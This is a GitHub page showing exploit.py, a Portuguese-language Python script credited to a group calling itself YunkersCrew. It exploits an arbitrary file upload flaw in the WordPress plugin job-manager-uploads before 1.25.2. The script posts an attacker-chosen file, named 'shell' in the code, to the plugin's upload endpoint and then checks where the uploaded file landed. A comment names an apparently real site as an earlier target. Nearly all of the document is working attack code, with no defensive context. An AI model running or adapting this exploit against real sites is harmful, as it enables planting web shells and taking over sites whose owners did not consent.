-
Notifications
You must be signed in to change notification settings - Fork 4
Expand file tree
/
Copy pathexploit.py
More file actions
104 lines (100 loc) · 3.21 KB
/
Copy pathexploit.py
File metadata and controls
104 lines (100 loc) · 3.21 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
try:
import requests
except:
print("Modulo 'requests' nao instalado!\nExecute: pip install requests")
import sys
import re
index = """
coded by supr3m0 & w4rlo6k
__ __ _ ____
\ \ / / _ _ __ | | _____ _ __ ___ / ___|_ __ _____ __
\ V / | | | '_ \| |/ / _ \ '__/ __| | | '__/ _ \ \ /\ / /
| || |_| | | | | < __/ | \__ \ |___| | | __/\ V V /
|_| \__,_|_| |_|_|\_\___|_| |___/\____|_| \___| \_/\_/
www.fb.com/yunkers01/ Recoda nao comedia
Wordpress plugin 'job-manager-uploads < 1.25.2'
Falha: Arbitrary File Upload
------------------------------------------------------------"""
ajuda = """
Exploit escrito por supr3m0 & w4rlo6k
__ __ _ ____
\ \ / / _ _ __ | | _____ _ __ ___ / ___|_ __ _____ __
\ V / | | | '_ \| |/ / _ \ '__/ __| | | '__/ _ \ \ /\ / /
| || |_| | | | | < __/ | \__ \ |___| | | __/\ V V /
|_| \__,_|_| |_|_|\_\___|_| |___/\____|_| \___| \_/\_/
www.fb.com/yunkers01/ Recoda nao comedia
Wordpress plugin 'job-manager-uploads < 1.25.2'
Falha: Arbitrary File Upload
------------------------------------------------------------
Use: python exploit.py --arquivo image.png --url http://site.com/PATH_WP/ --ano 2017 --mes 03"""
###############################################################################
x = sys.argv
if len(x) < 4:
print(ajuda)
exit()
if x[1] == "--arquivo":
arquivo = x[2]
else:
print(ajuda)
exit()
if x[3] == "--url":
url = x[4]
else:
print(ajuda)
exit()
if x[5] == "--ano":
ano = x[6]
else:
print(ajuda)
exit()
if x[7] == "--mes":
mes = x[8]
else:
print(ajuda)
exit()
if url[:8] != "https://" and url[:7] != "http://":
print('\n[-] Tipo de URL invalida.')
print("[!] Insira a URL assim: http://site.com/")
exit()
if "/" in url[9:]:
url = x[4]
else:
print('\n[-] Tipo de URL invalida.')
print("[!] Insira o site com o '/' no final\nExemplo: http://site.com/")
exit()
print(index)
print("[+] Site:",url,"\n[+] Arquivo:",arquivo, "\n[=] Iniciando(...)")
###############################################################################
vuln_dir = url + "jm-ajax/upload_file/"
shell = open(arquivo, "rb")
payload = {"files" : shell}
try:
conexao = requests.get(vuln_dir)
vulner = "files"
if conexao.status_code == 200:
if vulner in conexao.text:
print("\n[#] Enviando Exploit(...)")
injetar = requests.post(vuln_dir, files=payload)
falha = "error"
if falha in injetar.text:
print("\n[-] Ocorreu um erro ao enviar o arquivo!")
print(injetar.text)
exit()
else:
#"url":"http:\/\/tecnicoemineracao.com.br\/wp-content\/uploads\/job-manager-uploads\/files\/2017\/03\/s.png"
shl = url + "wp-content/uploads/job-manager-uploads/files/" + ano + "/" + mes + "/" + arquivo
shell_dir = requests.get(shl)
if shell_dir.status_code == 200:
print("[+] Exploit executado com sucesso!!!\n[+] Local do arquivo:",shl)
exit()
else:
print(injetar.text)
exit()
else:
print("\n[-] Site nao vulneravel :/")
exit()
else:
print("\n[-] Nao consegui me conectar ao site :/")
exit()
except:
print("")